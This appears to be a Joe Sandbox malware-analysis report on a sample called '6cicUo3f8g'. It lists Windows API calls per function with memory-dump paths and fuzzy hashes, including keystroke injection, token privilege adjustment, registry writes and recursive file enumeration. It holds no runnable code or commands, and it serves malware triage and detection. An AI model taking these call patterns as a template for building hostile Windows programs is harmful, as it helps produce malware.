                                                                                                                • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                                • Instruction ID: 2a8710168668487c8ae311e7aec877937110756e4684706c93a68fe18334e105
                                                                                                                • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                                • Instruction Fuzzy Hash: 70D05E3090520CABCB10CAA99D0499973A89706320F004755F91583280D63599009790
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __wfsopen
                                                                                                                • String ID:
                                                                                                                • API String ID: 197181222-0
                                                                                                                • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                • Instruction ID: 10804b0fc9bada23ecda289e1cd933215f73579e647289bcd3ba0a44aeeccd8e
                                                                                                                • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                • Instruction Fuzzy Hash: 89B0927644020C7BCE012A86EC02B4A3B199B81764F408020FB1C181B2A673A6A49A89
                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(000001F4), ref: 01673999
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2160356077.0000000001671000.00000040.00000020.00020000.00000000.sdmp, Offset: 01671000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1671000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Sleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 3472027048-0
                                                                                                                • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                • Instruction ID: 1069bb883cb3ee0b9d9fa74cd50174a75b920e4438e4028b6b517163c93abcb7
                                                                                                                • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                • Instruction Fuzzy Hash: 92E0BF7494010DEFDB00DFA4D9496ED7BB4FF04301F1005A1FD05D7680DB309E549A62
                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(000001F4), ref: 01673999
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2160356077.0000000001671000.00000040.00000020.00020000.00000000.sdmp, Offset: 01671000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1671000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Sleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 3472027048-0
                                                                                                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                • Instruction ID: 24447719f1757f169ea49266462c5ccdb2f0b01853b67300a39db884618c3f2a
                                                                                                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                • Instruction Fuzzy Hash: AFE0E67494010DDFDB00DFB4D9496AD7BB4FF04301F100161FD01D2280D6309D509A62
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E2612: GetWindowLongW.USER32(?,000000EB), ref: 008E2623
                                                                                                                • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0096CB37
                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0096CB95
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0096CBD6
                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0096CC00
                                                                                                                • SendMessageW.USER32 ref: 0096CC29
                                                                                                                • _wcsncpy.LIBCMT ref: 0096CC95
                                                                                                                • GetKeyState.USER32(00000011), ref: 0096CCB6
                                                                                                                • GetKeyState.USER32(00000009), ref: 0096CCC3
                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0096CCD9
                                                                                                                • GetKeyState.USER32(00000010), ref: 0096CCE3
                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0096CD0C
                                                                                                                • SendMessageW.USER32 ref: 0096CD33
                                                                                                                • SendMessageW.USER32(?,00001030,?,0096B348), ref: 0096CE37
                                                                                                                • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0096CE4D
                                                                                                                • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0096CE60
                                                                                                                • SetCapture.USER32(?), ref: 0096CE69
                                                                                                                • ClientToScreen.USER32(?,?), ref: 0096CECE
                                                                                                                • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0096CEDB
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0096CEF5
                                                                                                                • ReleaseCapture.USER32 ref: 0096CF00
                                                                                                                • GetCursorPos.USER32(?), ref: 0096CF3A
                                                                                                                • ScreenToClient.USER32(?,?), ref: 0096CF47
                                                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0096CFA3
                                                                                                                • SendMessageW.USER32 ref: 0096CFD1
                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0096D00E
                                                                                                                • SendMessageW.USER32 ref: 0096D03D
                                                                                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0096D05E
                                                                                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0096D06D
                                                                                                                • GetCursorPos.USER32(?), ref: 0096D08D
                                                                                                                • ScreenToClient.USER32(?,?), ref: 0096D09A
                                                                                                                • GetParent.USER32(?), ref: 0096D0BA
                                                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0096D123
                                                                                                                • SendMessageW.USER32 ref: 0096D154
                                                                                                                • ClientToScreen.USER32(?,?), ref: 0096D1B2
                                                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0096D1E2
                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0096D20C
                                                                                                                • SendMessageW.USER32 ref: 0096D22F
                                                                                                                • ClientToScreen.USER32(?,?), ref: 0096D281
                                                                                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0096D2B5
                                                                                                                  • Part of subcall function 008E25DB: GetWindowLongW.USER32(?,000000EB), ref: 008E25EC
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0096D351
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                • String ID: @GUI_DRAGID$F
                                                                                                                • API String ID: 3977979337-4164748364
                                                                                                                • Opcode ID: a1dc0513c605e7d5efb17dfd46fdc854f0e9dd4070d2f96a77b6c88162729c7c
                                                                                                                • Instruction ID: 4c740782a56f14182ab29c172fcbef883d42fee397a7b3cab045bdfe7133b16a
                                                                                                                • Opcode Fuzzy Hash: a1dc0513c605e7d5efb17dfd46fdc854f0e9dd4070d2f96a77b6c88162729c7c
                                                                                                                • Instruction Fuzzy Hash: FC4289B4608281AFD724CF38D858ABABBE9FF49314F14091DF5A5972B0C775D840EB92
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 009684D0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: %d/%02d/%02d
                                                                                                                • API String ID: 3850602802-328681919
                                                                                                                • Opcode ID: 2400bdd88607f8e3237b9e37d04bd3a621dd806014900825ad73f05812cfb472
                                                                                                                • Instruction ID: d9a03cb0e4e73fef0abdc9f4ff2f3a8e3c257501a26467a2a4403b1a634899bc
                                                                                                                • Opcode Fuzzy Hash: 2400bdd88607f8e3237b9e37d04bd3a621dd806014900825ad73f05812cfb472
                                                                                                                • Instruction Fuzzy Hash: 4612D071504209AFEB258F64DC49FAF7BB8EF86314F104629F915EA2E1DFB48941CB60
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove$_memset
                                                                                                                • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                                                                                • API String ID: 1357608183-1798697756
                                                                                                                • Opcode ID: a46adf8d3ece52cd527725f29168436d42c3a31619d04eaeefceceeff892b49b
                                                                                                                • Instruction ID: 08614725470b630d31c624cd388700b61fd2c077c8ee137f2335593a5bd703ab
                                                                                                                • Opcode Fuzzy Hash: a46adf8d3ece52cd527725f29168436d42c3a31619d04eaeefceceeff892b49b
                                                                                                                • Instruction Fuzzy Hash: D993AE75A44219DBDB24CFA8C881BBDB7B1FF48310F25816AE955EB290E7749E81CF40
                                                                                                                APIs
                                                                                                                • GetForegroundWindow.USER32(00000000,?), ref: 008E48DF
                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0091D665
                                                                                                                • IsIconic.USER32(?), ref: 0091D66E
                                                                                                                • ShowWindow.USER32(?,00000009), ref: 0091D67B
                                                                                                                • SetForegroundWindow.USER32(?), ref: 0091D685
                                                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0091D69B
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0091D6A2
                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 0091D6AE
                                                                                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 0091D6BF
                                                                                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 0091D6C7
                                                                                                                • AttachThreadInput.USER32(00000000,?,00000001), ref: 0091D6CF
                                                                                                                • SetForegroundWindow.USER32(?), ref: 0091D6D2
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0091D6E7
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 0091D6F2
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0091D6FC
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 0091D701
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0091D70A
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 0091D70F
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0091D719
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 0091D71E
                                                                                                                • SetForegroundWindow.USER32(?), ref: 0091D721
                                                                                                                • AttachThreadInput.USER32(?,?,00000000), ref: 0091D748
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                • API String ID: 4125248594-2988720461
                                                                                                                • Opcode ID: 1b49921f372d8fb2c244cdee00ce4fae75f4eb5794ff5f8102e5e1d1154a5fd6
                                                                                                                • Instruction ID: f8c80c5baa66d713a21e3d6ddb5706783f568c3bbb74918dd8ada6492b5de075
                                                                                                                • Opcode Fuzzy Hash: 1b49921f372d8fb2c244cdee00ce4fae75f4eb5794ff5f8102e5e1d1154a5fd6
                                                                                                                • Instruction Fuzzy Hash: 95317271B5531CBAEB216B619C49FBF7E6CEB44B50F104029FA05EA1D1CAB05D40BAA1
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009387E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0093882B
                                                                                                                  • Part of subcall function 009387E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00938858
                                                                                                                  • Part of subcall function 009387E1: GetLastError.KERNEL32 ref: 00938865
                                                                                                                • _memset.LIBCMT ref: 00938353
                                                                                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 009383A5
                                                                                                                • CloseHandle.KERNEL32(?), ref: 009383B6
                                                                                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 009383CD
                                                                                                                • GetProcessWindowStation.USER32 ref: 009383E6
                                                                                                                • SetProcessWindowStation.USER32(00000000), ref: 009383F0
                                                                                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0093840A
                                                                                                                  • Part of subcall function 009381CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00938309), ref: 009381E0
                                                                                                                  • Part of subcall function 009381CB: CloseHandle.KERNEL32(?,?,00938309), ref: 009381F2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                • String ID: $default$winsta0
                                                                                                                • API String ID: 2063423040-1027155976
                                                                                                                • Opcode ID: 309e90338ff03da9bfa46db338ecc5c5848d6cb9999df63a90ea8ff1028b93e7
                                                                                                                • Instruction ID: 906978e114f24cfd2b5735f260aba5614a9fdfb5ee6bc4d7229634606edf167f
                                                                                                                • Opcode Fuzzy Hash: 309e90338ff03da9bfa46db338ecc5c5848d6cb9999df63a90ea8ff1028b93e7
                                                                                                                • Instruction Fuzzy Hash: 0B8148B1914209AFDF119FA4DC49AEFBBB9FF04304F1441A9F911A62A1DB718E14DF20
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0094C78D
                                                                                                                • FindClose.KERNEL32(00000000), ref: 0094C7E1
                                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0094C806
                                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0094C81D
                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0094C844
                                                                                                                • __swprintf.LIBCMT ref: 0094C890
                                                                                                                • __swprintf.LIBCMT ref: 0094C8D3
                                                                                                                  • Part of subcall function 008E7DE1: _memmove.LIBCMT ref: 008E7E22
                                                                                                                • __swprintf.LIBCMT ref: 0094C927
                                                                                                                  • Part of subcall function 00903698: __woutput_l.LIBCMT ref: 009036F1
                                                                                                                • __swprintf.LIBCMT ref: 0094C975
                                                                                                                  • Part of subcall function 00903698: __flsbuf.LIBCMT ref: 00903713
                                                                                                                  • Part of subcall function 00903698: __flsbuf.LIBCMT ref: 0090372B
                                                                                                                • __swprintf.LIBCMT ref: 0094C9C4
                                                                                                                • __swprintf.LIBCMT ref: 0094CA13
                                                                                                                • __swprintf.LIBCMT ref: 0094CA62
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                                                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                • API String ID: 3953360268-2428617273
                                                                                                                • Opcode ID: 563078930e36f9b988a95bbe3137be5eb3779f68c4ea647388fcc64e12a0dd23
                                                                                                                • Instruction ID: 994f5e733ae9fb6f35c3df8f7a95de1ea764f63d0dfeb2ab81e4da3d06f422bf
                                                                                                                • Opcode Fuzzy Hash: 563078930e36f9b988a95bbe3137be5eb3779f68c4ea647388fcc64e12a0dd23
                                                                                                                • Instruction Fuzzy Hash: 41A14EB1508244AFC710EF99C886DAFB7ECFF86704F400929F595C6191EA71DA08CB63
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0094EFB6
                                                                                                                • _wcscmp.LIBCMT ref: 0094EFCB
                                                                                                                • _wcscmp.LIBCMT ref: 0094EFE2
                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 0094EFF4
                                                                                                                • SetFileAttributesW.KERNEL32(?,?), ref: 0094F00E
                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0094F026
                                                                                                                • FindClose.KERNEL32(00000000), ref: 0094F031
                                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 0094F04D
                                                                                                                • _wcscmp.LIBCMT ref: 0094F074
                                                                                                                • _wcscmp.LIBCMT ref: 0094F08B
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0094F09D
                                                                                                                • SetCurrentDirectoryW.KERNEL32(00998920), ref: 0094F0BB
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0094F0C5
                                                                                                                • FindClose.KERNEL32(00000000), ref: 0094F0D2
                                                                                                                • FindClose.KERNEL32(00000000), ref: 0094F0E4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 1803514871-438819550
                                                                                                                • Opcode ID: 6dfa18c54dca8eb0277fff793147bd572cf6607521be643a94ed3713419c3aa4
                                                                                                                • Instruction ID: 5bf0b2f89c0a22b26fc655d40c82ef1a23aee8fb758c0275cb07b76ec6dd1a72
                                                                                                                • Opcode Fuzzy Hash: 6dfa18c54dca8eb0277fff793147bd572cf6607521be643a94ed3713419c3aa4
                                                                                                                • Instruction Fuzzy Hash: 0A31D33250521A6EDF14DFB4EC68EEE77ACAF89364F10417AF814E20A1DB70DA44DE61
                                                                                                                APIs
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00960953
                                                                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,0096F910,00000000,?,00000000,?,?), ref: 009609C1
                                                                                                                • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00960A09
                                                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00960A92
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00960DB2
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00960DBF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$ConnectCreateRegistryValue
                                                                                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                • API String ID: 536824911-966354055
                                                                                                                • Opcode ID: e811ae5efc99df3f84124bc173f83700d7ca58120d458b775aa627f123821dcf
                                                                                                                • Instruction ID: db01868444550494d76516b020bc5a4bfc1a51df1e24540509dbafa76837c724
                                                                                                                • Opcode Fuzzy Hash: e811ae5efc99df3f84124bc173f83700d7ca58120d458b775aa627f123821dcf
                                                                                                                • Instruction Fuzzy Hash: 2E025E756006519FCB14DF19C895E2AB7E5FF89314F04856DF8999B3A2CB74EC01CB82
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0094F113
                                                                                                                • _wcscmp.LIBCMT ref: 0094F128
                                                                                                                • _wcscmp.LIBCMT ref: 0094F13F
                                                                                                                  • Part of subcall function 00944385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 009443A0
                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0094F16E
                                                                                                                • FindClose.KERNEL32(00000000), ref: 0094F179
                                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 0094F195
                                                                                                                • _wcscmp.LIBCMT ref: 0094F1BC
                                                                                                                • _wcscmp.LIBCMT ref: 0094F1D3
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0094F1E5
                                                                                                                • SetCurrentDirectoryW.KERNEL32(00998920), ref: 0094F203
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0094F20D
                                                                                                                • FindClose.KERNEL32(00000000), ref: 0094F21A
                                                                                                                • FindClose.KERNEL32(00000000), ref: 0094F22C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 1824444939-438819550
                                                                                                                • Opcode ID: b363e12834daf7bad62ccd090d8e30701ed58b800e72e2141e3f30881a6c396c
                                                                                                                • Instruction ID: a91ab42314b5c9e8b7fb7dc4323222f2e70e6e502180ed721c56c744a475f622
                                                                                                                • Opcode Fuzzy Hash: b363e12834daf7bad62ccd090d8e30701ed58b800e72e2141e3f30881a6c396c
                                                                                                                • Instruction Fuzzy Hash: 8631033650521A6EDF20AFB4EC68FEE77AC9F89364F100175F824E20A0DBB0DE45CA54
                                                                                                                APIs
                                                                                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0094A20F
                                                                                                                • __swprintf.LIBCMT ref: 0094A231
                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 0094A26E
                                                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0094A293
                                                                                                                • _memset.LIBCMT ref: 0094A2B2
                                                                                                                • _wcsncpy.LIBCMT ref: 0094A2EE
                                                                                                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0094A323
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0094A32E
